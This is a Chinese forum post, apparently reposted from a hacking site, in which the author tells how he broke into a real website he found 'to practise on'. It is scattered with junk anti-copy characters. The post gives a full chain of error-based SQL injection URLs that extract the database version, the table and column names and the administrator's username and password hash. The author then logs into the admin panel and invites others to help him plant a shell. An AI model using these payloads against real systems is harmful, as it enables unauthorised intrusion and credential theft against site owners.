近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。& ]3 ~7 ?% t4 n+ ?
首先找到网站后台,加了个admin,后台出来了 ( f' N* ~& d; [# W3 W8 ^2 r4 a
7 W, V- O1 e; z" \* E' O; Z0 }1 w$ v: ^+ `! \ L1 F3 [$ i
然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入. @. Y6 f' y% \
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—
5 a( w0 J8 O/ K* o
( t3 u& z t3 ~* u3 K1 _& r3 f6 \3 }& ^: ~1 b" b( l% h& D
6 J, @; t9 m+ G8 i
# Y- Y* t O* y/ n" {" qhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg! o& i& b: |( h4 o3 _
8 B4 l! L- t- A
! @( H; L" b" F# ]( ?
2 i! k" I3 O _- Y; g g
9 [8 B. g# e1 n; S: m可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator) x$ X! @5 A; ?9 D" l
: x5 T! _( h( e) j
' _& q7 \: ^, rhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg
& ~( u; C9 c+ M; G+ [8 U
, }8 H7 i1 N1 Z0 h, L1 ?9 p5 M; e u7 c2 Q
查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))-- ?0 a% S/ R) ^; Y
4 s& ~2 |: z* L( w" G# Y3 p3 x4 A4 j0 S7 Q4 q: A, N0 ?# A
! C ~% ^7 n5 @ 得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--
1 q, T8 ^3 X _1 Y4 t4 j0 a; T
' V0 a$ J1 e9 u3 ]8 J- C R
! @' ~3 ]4 d) ?2 b) w; O' l" Z/ D
得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 |